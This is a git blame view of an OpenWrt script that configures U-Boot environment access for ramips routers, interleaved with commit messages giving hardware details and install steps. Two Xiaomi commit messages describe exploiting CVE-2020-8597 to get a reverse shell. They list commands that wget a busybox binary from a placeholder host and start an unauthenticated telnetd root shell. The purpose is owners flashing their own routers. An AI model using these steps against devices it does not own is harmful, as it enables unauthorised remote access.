61 lines
1.3 KiB
Plaintext
Raw Normal View History

#!/bin/sh
#
# Copyright (C) 2011-2012 OpenWrt.org
#
[ -e /etc/config/ubootenv ] && exit 0
touch /etc/config/ubootenv
. /lib/uboot-envtools.sh
. /lib/functions.sh
board=$(board_name)
case "$board" in
alfa-network,ac1200rm|\
alfa-network,awusfree1|\
alfa-network,quad-e4g|\
alfa-network,r36m-e4g|\
ramips: add support for Senao Engenius ESR600H FCC ID: A8J-ESR750H Engenius ESR600H is an indoor wireless router with a gigabit switch, 2.4 GHz and 5 GHz wireless, internal and external antennas, and a USB port. **Specification:** - RT3662F MIPS SOC, 5 GHz WMAC (2x2) - RT5392L PCI on-board, 2.4 GHz (2x2) - AR8327 RGMII, 7-port GbE, 25 MHz clock - 40 MHz reference clock - 8 MB FLASH 25L6406EM2I-12G - 64 MB RAM - UART at J12 (unpopulated) - 2 internal antennas (5 GHz) - 2 external antennas (2.4 GHz) - 9 LEDs, 1 button (power, wps, wifi2g, wifi5g, 5 LAN/WAN) - USB 2 port (GPIO controlled power) **MAC addresses:** MAC Addresses are labeled as WAN and WLAN U-boot environment has the the vendor MAC address for ethernet MAC addresses in "factory" are part of wifi calibration data eth0.2 WAN *:13:e7 u-boot-env wanaddr eth0.1 ---- *:13:e8 u-boot-env wanaddr + 1 phy0 WLAN *:14:b8 factory 0x8004 phy1 ---- *:14:bc factory 0x4 **Installation:** Method 1: Firmware upgrade page OEM webpage at 192.168.0.1 username and password "admin" Navigate to Network Setting --> Tools --> Firmware Click Browse and select the factory.dlf image Click Continue to confirm and wait 6 minutes or more... Method 2: Serial console to load TFTP image: (see TFTP recovery) **Return to OEM:** Unlike most Engenius boards, this does not have a 'failsafe' image the only way to return to OEM is serial access to uboot Unlike most Engenius boards, public images are not available... so the only way to return to OEM is to have a copy of the MTD partition "firmware" BEFORE flashing openwrt. **TFTP recovery:** Unlike most Engenius boards, TFTP is reliable here however it requires serial console access (soldering pins to the UART pinouts) build your own image... with 'ramdisk' selected under 'Target Images' rename initramfs-kernel.bin to 'uImageESR-600H' make the file available on a TFTP server at 192.168.99.8 interrupt boot by holding or pressing '4' in serial console as soon as board is powered on `tftpboot 0x81000000` `bootm 0x81000000` perform a sysupgrade **Format of OEM firmware image:** This Engenius board uses the Senao proprietary header with a unique Product ID. The header for factory.bin is generated by the mksenaofw program included in openwrt. .dlf file extension is also required for OEM software to accept it **Note on using OKLI:** the kernel is now too large for the bootloader to handle so OKLI is used via the `kernel-loader` image command recently in master several other ramips boards have the same problem 'Kernel panic - not syncing: Failed to find ralink,rt3883-sysc node' see commit ad19751edc21ae713bd95df6b93be64bd1e0c612 Signed-off-by: Michael Pratt <mcpratt@pm.me>
2020-11-26 03:33:40 -05:00
alfa-network,tube-e4g|\
engenius,esr600h)
ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x1000" "0x1000"
;;
allnet,all0256n-4m|\
allnet,all0256n-8m|\
allnet,all5002)
ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x10000" "0x10000"
;;
buffalo,wsr-1166dhp|\
buffalo,wsr-600dhp|\
mediatek,linkit-smart-7688|\
samknows,whitebox-v8|\
xiaomi,mi-router-3g-v2|\
xiaomi,mi-router-4a-gigabit|\
xiaomi,mi-router-4c|\
xiaomi,miwifi-nano|\
zbtlink,zbt-wg2626)
ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x1000" "0x10000"
;;
ramips: fix partitions and boot for RAVPower RP-WD03 The RAVPower RP-WD03 is a battery powered router, with an Ethernet and USB port. Due due a limitation in the vendor supplied U-Boot bootloader, we cannot exceed a 1.5 MB kernel size, as is the case with recent builds (i.e. post v19.07). This breaks both factory and sysupgrade images. To address this, use the lzma loader (loader-okli) to work around this limitation. The improvements here also address the "misplaced" U-Boot environment partition, which is located between the kernel and rootfs in the stock image / implementation. This is addressed by making use of mtd-concat, maximizing space available in the booted image. This will make sysupgrade from earlier versions impossible. Changes are based on the recently supported HooToo HT-TM05, as the hardware is almost identical (except for RAM size) and is from the same vendor (SunValley). While at it, also change the SPI frequency accordingly. Installation: - Download the needed OpenWrt install files, place them in the root of a clean TFTP server running on your computer. Rename the files as, - openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-kernel.bin => kernel - openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-rootfs.bin => rootfs - Plug the router into your computer via Ethernet - Set your computer to use 10.10.10.254 as its IP address - With your router shut down, hold down the power button until the first white LED lights up. - Push and hold the reset button and release the power button. Continue holding the reset button for 30 seconds or until it begins searching for files on your TFTP server, whichever comes first. - The router (10.10.10.128) will look for your computer at 10.10.10.254 and install the two files. Once it has finished installation, it will automatically reboot and start up OpenWrt. - Set your computer to use DHCP for its IP address Notes: - U-Boot environment can be modified, u-boot-env is preserved on initial install or sysupgrade - mtd-concat functionality is included, to leave a "hole" for u-boot-env, combining the OEM kernel and rootfs partitions Most of the changes in this commit are the work of Russell Morris (as credited below), I only wrapped them up and added compat-version. Thanks to @mpratt14 and @xabolcs for their help getting the lzma loader to work! Fixes: 5ef79af4f80f ("ramips: add support for Ravpower WD03") Suggested-by: Russell Morris <rmorris@rkmorris.us> Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2020-09-11 17:40:46 +02:00
hootoo,ht-tm05|\
ravpower,rp-wd03)
ramips: add support for HooToo HT-TM05 The HooToo HT-TM05 is a battery powered router, with an Ethernet and USB port. Vendor U-Boot limited to 1.5 MB kernel size, so use lzma loader (loader-okli). Specifications: SOC: MediaTek MT7620N BATTERY: 10400mAh WLAN: 802.11bgn LAN: 1x 10/100 Mbps Ethernet USB: 1x USB 2.0 (Type-A) RAM: 64 MB FLASH: GigaDevice GD25Q64, Serial 8 MB Flash, clocked at 50 MHz Flash itself specified to 80 MHz, but speed limited by mt7620 SPI fast-read enabled (m25p) LED: Status LED (blue after boot, green with WiFi traffic 4 leds to indicate power level of the battery (unable to control) INPUT: Power, reset button MAC assignment based on vendor firmware: 2.4 GHz *:b4 (factory 0x04) LAN/label *:b4 (factory 0x28) WAN *:b5 (factory 0x2e) Tested and working: - Ethernet - 2.4 GHz WiFi (Correct MAC-address) - Installation from TFTP (recovery) - OpenWRT sysupgrade (Preserving and non-preserving), through the usual ways: command line and LuCI - LEDs (except as noted above) - Button (reset) - I2C, which is needed for reading battery charge status and level - U-Boot environment / variables (from U-Boot, and OpenWrt) Installation: - Download the needed OpenWrt install files, place them in the root of a clean TFTP server running on your computer. Rename the files as, - ramips-mt7620-hootoo_tm05-squashfs-kernel.bin => kernel - ramips-mt7620-hootoo_tm05-squashfs-rootfs.bin => rootfs - Plug the router into your computer via Ethernet - Set your computer to use 10.10.10.254 as its IP address - With your router shut down, hold down the power button until the first white LED lights up. - Push and hold the reset button and release the power button. Continue holding the reset button for 30 seconds or until it begins searching for files on your TFTP server, whichever comes first. - The router (10.10.10.128) will look for your computer at 10.10.10.254 and install the two files. Once it has finished installation, it will automatically reboot and start up OpenWrt. - Set your computer to use DHCP for its IP address Notes: - U-Boot environment can be modified, u-boot-env is preserved on initial install or sysupgrade - mtd-concat functionality is included, to leave a "hole" for u-boot-env, combining the OEM kernel and rootfs partitions I would like to thank @mpratt14 and @xabolcs for their help getting the lzma loader to work! Signed-off-by: Russell Morris <rmorris@rkmorris.us> [drop changes in image/Makefile, fix indent and PKG_RELEASE in uboot-envtools, fix LOADER_FLASH_OFFS, minor commit message facelift, add COMPILE to Device/Default] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-12-24 18:38:36 -06:00
idx="$(find_mtd_index u-boot-env)"
[ -n "$idx" ] && \
ubootenv_add_uci_config "/dev/mtd$idx" "0x4000" "0x1000" "0x1000"
;;
linksys,ea7300-v1|\
linksys,ea7300-v2|\
ramips: add support for Linksys EA7500 v2 The Linksys EA7500 v2 is advertised as AC1900, but its internal hardware is AC2600 capable. Hardware -------- SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads) RAM: 256M (Nanya NT5CC128M16IP-DI) FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI) ETH: 5x 10/100/1000 Mbps Ethernet (MT7530) WIFI: - 2.4GHz: 1x MT7615N (4x4:4) - 5GHz: 1x MT7615N (4x4:4) - 4 antennas: 3 external detachable antennas and 1 internal USB: - 1x USB 3.0 - 1x USB 2.0 BTN: - 1x Reset button - 1x WPS button LEDS: - 1x White led (Power) - 6x Green leds (link lan1-lan4, link wan, wps) - 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable) Everything works correctly. Installation ------------ The “factory” openwrt image can be flashed directly from OEM stock firmware. After the flash the router will reboot automatically. However, due to the dual boot system, the first installation could fail (if you want to know why, read the footnotes). If the flash succeed and you can reach OpenWrt through the web interface or ssh, you are done. Otherwise the router will try to boot 3 times and then will automatically boot the OEM firmware (don’t turn off the router. Simply wait and try to reach the router through the web interface every now and then, it will take few minutes). After this, you should be back in the OEM firmware. Now you have to flash the OEM Firmware over itself using the OEM web interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img downloaded from the Linksys website). When the router reboots flash the “factory” OpenWrt image and this time it should work. After the OpenWrt installation you have to use the sysupgrade image for future updates. Restore OEM Firmware -------------------- After the OpenWrt flash, the OEM firmware is still stored in the second partition thanks to the dual boot system. You can switch from OpenWrt to OEM firmware and vice-versa failing the boot 3 times in a row: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware If you want to completely remove OpenWrt from your router, switch to the OEM firmware and then flash OEM firmware from the web interface as a normal update. This procedure will overwrite the OpenWrt partition. Footnotes --------- The Linksys EA7500-v2 has a dual boot system to avoid bricks. This system works using 2 pair of partitions: 1) "kernel" and "rootfs" 2) "alt_kernel" and "alt_rootfs". After 3 failed boot attempts, the bootloader tries to boot the other pair of partitions and so on. This system is managed by the bootloader, which writes a bootcount in the s_env partition, and if successfully booted, the system add a "zero-bootcount" after the previous value. A system update performed from OEM firmware, writes the firmware on the other pair of partitions and sets the bootloader to boot the new pair of partitions editing the “boot_part” variable in the bootloader vars. Effectively it's a quick and safe system to switch the selected boot partition. Another way to switch the boot partition is: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware In this OpenWrt port, this dual boot system is partially working because the bootloader sets the right rootfs partition in the cmdline but unfortunately OpenWrt for ramips platform overwrites the cmdline so is not possible to detect the right rootfs partition. Because all of this, I preferred to simply use the first pair of partitions and set read-only the other pair. However this solution is not optimal because is not possible to know without opening the case which is the current booted partition. Let’s take for example a router booting the OEM firmware from the first pair of partitions. If we flash the OpenWrt image, it will be written on the second pair. In this situation the router will bootloop 3 times and then will automatically come back to the first pair of partitions containg the OEM firmware. In this situation, to flash OpenWrt correctly is necessary to switch the booting partition, flashing again the OEM firmware over itself. At this point the OEM firmware is on both pair of partitions but the current booted pair is the second one. Now, flashing the OpenWrt factory image will write the firmware on the first pair and then will boot correctly. If this limitation in the ramips platform about the cmdline will be fixed, the dual boot system can also be implemented in OpenWrt with almost no effort. Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com> Co-Developed-by: Jackson Lim <jackcolentern@gmail.com> Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
2020-05-12 01:27:50 +02:00
linksys,ea7500-v2|\
xiaomi,mi-router-3g|\
xiaomi,mi-router-3-pro|\
ramips: Add support for Xiaomi Mi Router(Black,R2100) The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many characteristics (apart from its looks and the GPIO ports) with the 6-antenna *white* "Xiaomi Redmi Router AC2100" See the visual comparison of the two routers here: https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg Specification of R2100: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN in Yellow and Blue - UART: On board (Don't know where is should be confirmed by anybody else) - Modified u-boot Hacking of official firmware process is same at both RM2100 and R2100. Thanks to @namidairo Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide Guide is written for MacOS but it will work at linux. needed packages: python3(with scapy), netcat, http server, telnet client 1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware 2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0 other than these I specified in here. Everything is same with: https://github.com/openwrt/openwrt/commit/f3792690c4f0567a8965d82898295b9d50c3bb7e Thanks for all community and especially for this device: @Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com) MAC Locations: WAN *:b5 = factory 0xe006 LAN *:b6 = factory 0xe000 WIFI 5ghz *:b8 = factory 0x8004 WIFI 2.4ghz *:b7 = factory 0x0004 Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com> [refactored common image bits into Device/xiaomi-ac2100, fixed From:] Signed-off-by: Petr Štetiar <ynezz@true.cz>
2020-05-30 12:18:50 +03:00
xiaomi,mi-router-ac2100|\
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100) Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com>
2020-04-23 12:50:21 +10:00
xiaomi,redmi-router-ac2100)
ramips: improve Xiaomi Mi Router 3G support This commit improves support for the Xiaomi Mi Router 3G originally added in commit 6e283cdc0da25928f8148805ebef7f8f2b769ee8 Improvements: - Remove software watchdog as hardware watchdog now working as per commit 3fbf3ab44f5cebb22e30a4c8681b13341feed6a6 for all mt7621 devices. - Reset button polarity corrected - length of press determines reboot (short press) vs. reset to defaults (long press) behaviour. - Enable GPIO amber switch port LEDs on board rear - lit indicates 1Gbit link and blink on activity. Green LEDs driven directly by switch indicating any link speed and tx activity. - USB port power on/off GPIO exposed as 'usbpower' - Add access to uboot environment settings for checking/setting uboot boot order preference from user space. Changes: - Front LED indicator is physically made of independent Yellow/Amber, Red & Blue LEDs combined via a plastic 'lightpipe' to a front panel indicator, hence the colour behaviour is similar to an RGB LED. RGB LEDs are not supported at this time because they produce colour results that do not then match colour labels, e.g. enabling 'mir3g:red' and 'mir3g:blue' would result in a purple indicator and we have no such label for purple. The yellow, red & blue LEDs have been split out as individual yellow, red & blue status LEDs, with yellow being the default status LED as before and with red's WAN and blue's USB default associations removed. - Swapped order of vlan interfaces (eth0.1 & eth0.2) to match stock vlan layout. eth0.1 is LAN, eth0.2 is WAN - Add 'lwlll' vlan layout to mt7530 switch driver to prevent packet leakage between kernel switch init and uci swconfig uboot behaviour & system 'recovery' uboot expects to find bootable kernels at nand addresses 0x200000 & 0x600000 known by uboot as "system 1" and "system 2" respectively. uboot chooses which system to hand control to based on 3 environment variables: flag_last_success, flag_try_sys1_failed & flag_try_sys2_failed last_success represents a preference for a particular system and is set to 0 for system 1, set to 1 for system 2. last_success is considered *if* and only if both try_sys'n'_failed flags are 0 (ie. unset) If *either* failed flags are set then uboot will attempt to hand control to the non failed system. If both failed flags are set then uboot will check the uImage CRC of system 1 and hand control to it if ok. If the uImage CRC of system is not ok, uboot will hand control to system 2 irrespective of system 2's uImage CRC. NOTE: uboot only ever sets failed flags, it *never* clears them. uboot sets a system's failed flag if that system's was selected for boot but the uImage CRC is incorrect. Fortunately with serial console access, uboot provides the ability to boot an initramfs image transferred via tftp, similarly an image may be flashed to nand however it will flash to *both* kernels so a backup of stock kernel image is suggested. Note that the suggested install procedure below set's system 1's failed flag (stock) thus uboot ignores the last_success preference and boots LEDE located in system 2. Considerable thought has gone into whether LEDE should replace both kernels, only one (and which one) etc. LEDE kernels do not include a minimal rootfs and thus unlike the stock kernel cannot include a method of controlling uboot environment variables in the event of rootfs mount failure. Similarly uboot fails to provide an external mechanism for indicating boot system failure. Installation - from stock. Installation through telnet/ssh: - copy lede-ramips-mt7621-mir3g-squashfs-kernel1.bin and lede-ramips-mt7621-mir3g-squashfs-rootfs0.bin to usb disk or wget it from LEDE download site to /tmp - switch to /extdisks/sda1/ (if copied to USB drive) or to /tmp if wgetted from LEDE download site - run: mtd write lede-ramips-mt7621-mir3g-squashfs-kernel1.bin kernel1 - run: mtd write lede-ramips-mt7621-mir3g-squashfs-rootfs0.bin rootfs0 - run: nvram set flag_try_sys1_failed=1 - run: nvram commit - run: reboot Recovery - to stock. Assuming you used the above installation instructions you will have a stock kernel image in system 1. If it can be booted then it may be used to perform a stock firmware recovery, thus erasing LEDE completely. From a 'working' LEDE state (even failsafe) Failsafe only: - run: mount_root - run: sh /etc/uci-defaults/30_uboot-envtools Then do the steps for 'All' All: - run: fw_setenv flag_try_sys2_failed 1 - run: reboot The board will reboot into system 1 (stock basic kernel) and wait with system red light slowly blinking for a FAT formatted usb stick with a recovery image to be inserted. Press and hold the reset button for around 1 second. Status LED will turn yellow during recovery and blue when recovery complete. Signed-off-by: Kevin Darbyshire-Bryant <ldir@darbyshire-bryant.me.uk>
2017-09-25 20:41:13 +01:00
ubootenv_add_uci_config "/dev/mtd1" "0x0" "0x1000" "0x20000"
;;
esac
config_load ubootenv
config_foreach ubootenv_add_app_config ubootenv
exit 0